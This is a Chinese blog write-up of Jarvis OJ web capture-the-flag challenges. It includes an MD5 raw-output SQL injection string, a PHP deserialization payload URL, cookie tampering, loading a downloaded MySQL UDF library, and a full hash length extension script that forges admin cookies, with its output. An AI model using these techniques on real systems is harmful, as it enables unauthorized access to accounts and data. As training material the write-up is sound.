Jarvis OJ—Web

最新推荐文章于 2024-07-05 00:58:41 发布
最新推荐文章于 2024-07-05 00:58:41 发布
阅读量656 收藏
点赞数 4
文章标签: Jarvis OJ
m0re
本文链接:https://blog.csdn.net/qq_45836474/article/details/108682501
版权

本文目录


Web

PORT51

image.png

使用51端口,但是修改端口的话,32770就不是这道题的了,所以应该是使用本地的端口51来访问。所以就需要用到curl命令。image.png
image.png
curl命令可以进行学习一下,回头有空学习一下。

LOCALHOST

本地访问,简单题,设置一下hosts文件就行,将题目网址加上去就OK。
也可以使用插件
image.png
刷新一下得到flag
image.png

Login

登录,但是尝试了几个弱口令,还进行了爆破,不过没有得到flag,所以抓包抓包看看返回结果
image.png
这里有个hint,

"select * from `admin` where password='".md5($pass,true)."'"

一条查询语句,pass经过md5加密,想起来之前的那个特殊例子。ffifdyop
看了我之前做得题发现,这个题跟那个是一样的[BJDCTF2020]Easy MD5
image.png

神盾局的秘密

这个就有点意思了,没有头绪,看了wp,下面自己解题过程
查看源码,发现base64字符串,
image.png
先访问,
image.png
都是乱码,同时解出base64得到shield.jpg
这是一个文件包含,任意文件读取的漏洞,原因:谷歌浏览器是可以解析图片的,但是这个是图片,没有显示图片而是16进制,所以确定是文件包含漏洞了,
读取一下,showing.php
源代码中注释了


<?php
	$f = $_GET['img'];
	if (!empty($f)) {
		$f = base64_decode($f);
		if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE
		&& stripos($f,'pctf')===FALSE) {
			readfile($f);
		} else {
			echo "File not found!";
		}
	}
?>

get传参,base64加密参数,并且进行过滤,过滤 … 切换目录的操作,还有pctf字符串。
再读取index.php

<?php 
	require_once('shield.php');
	$x = new Shield();
	isset($_GET['class']) && $g = $_GET['class'];
	if (!empty($g)) {
		$x = unserialize($g);
	}
	echo $x->readfile();
?>

new了一个Shield对象,get进行传参,并且进行了反序列化处理。
尝试读取一下shield.php(c2hpZWxkLnBocA==)
image.png

<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this -> file = $filename;
		}
		
		function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
?>

再读一下pctf.php
发现file not found
因为前面将pctf过滤了,所以可以利用反序列化漏洞,先将序列化结果跑出来
image.png
O:6:“Shield”:1:{s:4:“file”;s:8:“pctf.php”;}
payload

http://web.jarvisoj.com:32768/?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}

注释的,在源码里。
image.png
参考博客——web—神盾局的秘密

admin

没有发现信息,所以就进行dirsearch
发现了robots.txt,在robots.txt中看到了Disallow: /admin_s3cr3t.php
访问看到flag{hello, guest},虽然猜到可能不是flag,但是还是尝试了一下。
果然不行,所以看看数据包的情况
image.png
根据以前的做题经验,这个地方应该有问题,所以抓包修改了一下,admin=1
就看到了image.png

RE

m0re
emmm不会,了解的知识太太太太太太少了。参考大佬wp
关于mysql扩展函数

有时候我们需要对表中的数据进行一些处理而内置函数不能满足需要的时候,就需要对MySQL进行一些扩展,使用者自行添加的MySQL函数就称为UDF(User Define Function)。

题目中提示help_me函数挺有意思
在mysql命令行中使用select @@plugin_dir;查看mysql的插件目录
m0re
切换到该目录,下载源文件。

wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172

然后重命名为udf.so
m0re
然后在命令行中创建help_me外部函数

create function help_me returns string soname 'udf.so';

然后调用help_me函数
m0re
发现还要调用getflag函数,所以再次创建函数
m0re

flag在管理员手里

看到这样只允许admin访问的页面,看看响应包
m0re
设置了cookie,是guest用户的,如果是admin的怎么修改?
尝试简单修改一下,结果很正常的失败了。
然后还进行了爆破,看看有无其他敏感文件和目录。
m0re
然后发现index.php~是可以访问的。是一个文件,应该是泄露数据。
但是打开是乱码,所以就拉到kali中使用file命令查看一下文件类型
发现是一个swap文件,是vim的,所以使用vim打开,但是还是乱码,尝试直接cat该文件
m0re
发现了内容,但是不是很直观。所以查到了该文件类型,是可复原的文件
m0re
所以可以使用vim -r来恢复数据
得到源码

<?php 		
	$auth = false;
	$role = "guest";
	$salt = 		
	if (isset($_COOKIE["role"])) {
			$role = unserialize($_COOKIE["role"]);			
			$hsh = $_COOKIE["hsh"];			
			if ($role==="admin" && $hsh ===md5($salt.strrev($_COOKIE["role"]))) {
					$auth = true;
			} else {
					$auth = false;			
			}		
	} else {			
			$s = serialize($role);			
			setcookie('role',$s);			
			$hsh = md5($salt.strrev($s));			
			setcookie('hsh',$hsh);		
	}		
	if ($auth) {			
			echo "<h3>Welcome Admin. Your flag is 		
	} else {			
			echo "<h3>Only Admin can see the flag!!</h3>";		}	
?>

查阅资料发现是哈希长度拓展攻击,
由于不知道$salt的长度,所以要进行爆破,需要用到一个工具
hashpumpy,安装方法——https://www.cnblogs.com/pcat/p/5478509.html
爆破脚本:

import requests,hashpumpy,urllib


def attack():
    url = 'http://web.jarvisoj.com:32778/'

    old_cookie = '3a4727d57463f122833d9e732f94e4e0'
    str1 = 's:5:"guest";'
    str2 = 's:5:"admin";'
    str1 = str1[::-1]                           #倒过来,这道题要role的值反过来求md5
    str2 = str2[::-1]

    for i in range(1,20):                       #用于爆破salt的长度
        new_cookie,message = hashpumpy.hashpump(old_cookie,str1,str2,i)
        payload = {'role':urllib.parse.quote(message[::-1]),'hsh':new_cookie}           #quote()可以把 \x00 变成 %00
        ans = requests.get(url,cookies = payload)
        print(i)
        print(ans.text)
        if 'welcome' in ans.text:
            print(ans.text)

#print(urllib.parse.quote('\x00'))
attack()

运行结果

12
<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
	body {
		background:gray;
		text-align:center;
	}
</style>
</head>

<body>
	<h3>Welcome Admin. Your flag is PCTF{H45h_ext3ndeR_i5_easy_to_us3} </h3>
</body>
</html>

下载,在010editor中看到是PDF文件,但是flag被图片挡住了,所以需要编辑PDF进行移开,这里使用金山PDF进行编辑,因为其他的没试过,听说不行。所以专门下载了一个金山PDF独立版的。
image.png
可以看到下面的字符串了,进行hex转str
image.png
wctf2020{th1s_1s_@_pdf_and_y0u_can_use_phot0sh0p}

这是base??

dict:{0: 'J', 1: 'K', 2: 'L', 3: 'M', 4: 'N', 5: 'O', 6: 'x', 7: 'y', 8: 'U', 9: 'V', 10: 'z', 11: 'A', 12: 'B', 13: 'C', 14: 'D', 15: 'E', 16: 'F', 17: 'G', 18: 'H', 19: '7', 20: '8', 21: '9', 22: 'P', 23: 'Q', 24: 'I', 25: 'a', 26: 'b', 27: 'c', 28: 'd', 29: 'e', 30: 'f', 31: 'g', 32: 'h', 33: 'i', 34: 'j', 35: 'k', 36: 'l', 37: 'm', 38: 'W', 39: 'X', 40: 'Y', 41: 'Z', 42: '0', 43: '1', 44: '2', 45: '3', 46: '4', 47: '5', 48: '6', 49: 'R', 50: 'S', 51: 'T', 52: 'n', 53: 'o', 54: 'p', 55: 'q', 56: 'r', 57: 's', 58: 't', 59: 'u', 60: 'v', 61: 'w', 62: '+', 63: '/', 64: '='}

chipertext:
FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw

dict原本以为是字典,需要一个一个对照,做了一遍发现不是这样的。
64个字符,base64…emmm=.=
image.png转换表显示63个,第64个是“=”
使用python写个脚本的话,参考一下python字典
image.png
所以参考大佬的脚本,写了一下

import base64
dict={0: 'J', 1: 'K', 2: 'L', 3: 'M', 4: 'N', 5: 'O', 6: 'x', 7: 'y', 8: 'U', 9: 'V', 10: 'z', 11: 'A', 12: 'B', 13: 'C', 14: 'D', 15: 'E', 16: 'F', 17: 'G', 18: 'H', 19: '7', 20: '8', 21: '9', 22: 'P', 23: 'Q', 24: 'I', 25: 'a', 26: 'b', 27: 'c', 28: 'd', 29: 'e', 30: 'f', 31: 'g', 32: 'h', 33: 'i', 34: 'j', 35: 'k', 36: 'l', 37: 'm', 38: 'W', 39: 'X', 40: 'Y', 41: 'Z', 42: '0', 43: '1', 44: '2', 45: '3', 46: '4', 47: '5', 48: '6', 49: 'R', 50: 'S', 51: 'T', 52: 'n', 53: 'o', 54: 'p', 55: 'q', 56: 'r', 57: 's', 58: 't', 59: 'u', 60: 'v', 61: 'w', 62: '+', 63: '/', 64: '='}
base64_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P','Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f','g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v','w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/']
cipher='FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw'
m0re=''
for i in range(len(cipher)):
    for j in range(64):
        if(dict[j]==cipher[i]):
            m0re+=base64_list[j]
print(m0re)
flag=base64.b64decode(m0re)
print(flag)

image.png

m0re
关注
Jarvis OJ web(一)
Lemon's blog
10-04 980
前言:总结一下最近做过的jarvisojweb题,有的很有意思,能学习到很多新知识 LOCALHOST 提示很明显,伪造IP地址即可 抓包进行伪造,即可得出flag Login 一个提交页面,源码中也没有发现什么线索,抓包来看一下 有一句提示 "select * from `admin` where password='".md5($pass,true)."'" 这里就涉及到MD5函数...
jarvisoj WEB +MISC writeup
Ni9htMar3的博客
12-26 7284
WEB PORT 51 Login LOCALHOST 神盾局的秘密 IN a mess Easy Gallery Simple Injection 方法一 方法二 api的调用 PHPINFO
Jarvis OJ WEB
沐目的博客
10-15 385
Jarvis OJ WEB 这道题,和web知识好像没有什么关系,但学到了一些技巧。 1.通过JavaScript也可以提交表单 2.python正香,竟然还能算矩阵 打开题目,打开源码,发现没有form标签,所以应该是用JavaScript提交的。于是找像样的JavaScript,就是他了:app.js。 打开后,去网上找js格式化,然后题目让我们输出password,那么我们就找passwrd...
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 418
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
jarvisoj_web_witerup
残阳泼茶香的博客
03-17 518
PORT51 该题提示我们需要使用51端口进入该站点 然而此站为http://web.jarvisoj.com:32770/ 它的端口已经是确定了的,所以只能更改我们的port了。 本来用的是kali虚拟机,不能通过外网,命令如下 curl --local-port 51 http://web.jarvisoj.com:32770/ 自己试试,我就懒得弄win上的curl命令了 L...
jarvisoj web-phpinfo
weixin_46578840的博客
09-10 136
打开题目地址得到源码 这题的突破点就是 ini_set(‘session.serialize_handler’, ‘php’); 查了下手册: php大于5.5.4的版本中默认使用php_serialize规则 通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。 再看到 当一个上传在处理中,同时POST一个与INI中设置的session.upl
Jarvis-OJ WEB 多题writeup
烟敛寒林的博客
04-19 4344
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格S...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 199
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
jarvis OJ
CHOOOU的博客
11-05 882
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;argc, argv, v8, v16) == 0)
Jarvis OJ
kof2019的博客
08-05 459
Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调试的过程 题目: 分析: 刚开始拿到这道题目还是想用IDA静态分析,但无奈函数太多找不到关键函数,看别人Writeup也只是说关键函数为sub_401BB0但不知道怎么找
jarvis oj web
weixin_44843084的博客
05-23 361
jarvis oj web题 flag在管理员手里 role=s:5:“guest”; hsh可能是role的md5加密,但是不是直接加密 index.php~有源码,改为.index.php.swp,输入命令vi -r index.php恢复index.php文件 有段 $role = unserialize($_COOKIE["role"]); if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) s
Jarvis OJ-Login
wyj_1216 House
10-03 1124
Login 时间:2018年10月3日 汇报人:王祎洁 题目 http://web.jarvisoj.com:32772/ 题解 查看页面源代码一无所获,采取抓包,随便输入一串试一下。 抓个包, 发现后台查询password的语句,这是一个md5加密后的sql注入。 md5($pass, true): 参数一是要加密的字符串; 参数二是输出格式:true,表示输出原始16字符二进...
171130 逆向-JarvisOJ(Fibonacci)
whklhhhh的博客
11-30 1125
1625-5 王子昂 总结《2017年11月30日》 【连续第426天总结】 A. JarvisOJ-Re-Fibonacci B. 首先运行,提示 来让我们玩一个数列游戏: a[0]=0,a[1]=1 a[2]=1,a[3]=2 a[4]=3,a[5]=5 ………….. 请计算a[100000000000000]: 刚开始还以为是通过什么算法做出来,准备
Jarvis OJ Login
沐目的博客
04-18 835
Jarvis OJ Login http://web.jarvisoj.com:32772/ 题目连接 打开题目,什么都没有,于是习惯性的抓一下包,然后发现提示。 Hint: “select * from admin where password=’”.md5(pass,true).&quot;′&quot;发现后台查询password的语句,这是一个md5加密后的sql注入。md...
jarvisoj——admin
D-R0s1的博客
10-08 784
  在接触jarvisoj平台的题目的时候,,第一个感觉就是考察的技能点比较多,比较全面,较其他平台相比题目比较难。但是当我们在努力弄懂一个题目考察的技能点及其解题思路的时候,收获也是很大的。再解决一些web题的过程中,除了要代码审计的时候要细心以外,在抓包分析的过程中也要十分的细心。虽然说比赛过程中,时间是很宝贵的,要提高做题速度,但是还是要步骤操作快,分析的时候要慢,,不然很可能漏掉一些细节线...
Jarvisoj刷题笔记(CTF Basic题)
Arthur_WangYu的博客
10-01 665
某天A君的网站被日,管理员密码被改,死活登不上,去数据库一看,啥,这密码md5不是和原来一样吗?为啥登不上咧?d78b6f302l25cdc811adfe8d4e7c9fd34 请提交PCTF{原来的管理员密码}
JarvisOJ pwn (一)
dezang2878的博客
04-13 115
0x 01 XMAN_level0常规的跟进函数,查看漏洞函数 可以看到函数里定义了一个字符变量他在栈中存放的位置是rsp-80h,而下面的read语句却允许我们输入最多512字节的数据,buf的首地址到rbp也就是栈帧的底部都才只有128个字,所以我们完全可以通过read函数来覆盖此函数的返回地址。然后就是查找程序中有没有可以用来攻击的程序或者语句 这里可以看到...
JarvisOJ:实战渗透挑战与信息获取技术
1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口(PORT51-100)访问,参与者需利用Kali Linux等工具,通过控制源端口为51进行通信。在这个过程中,通过curl命令并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值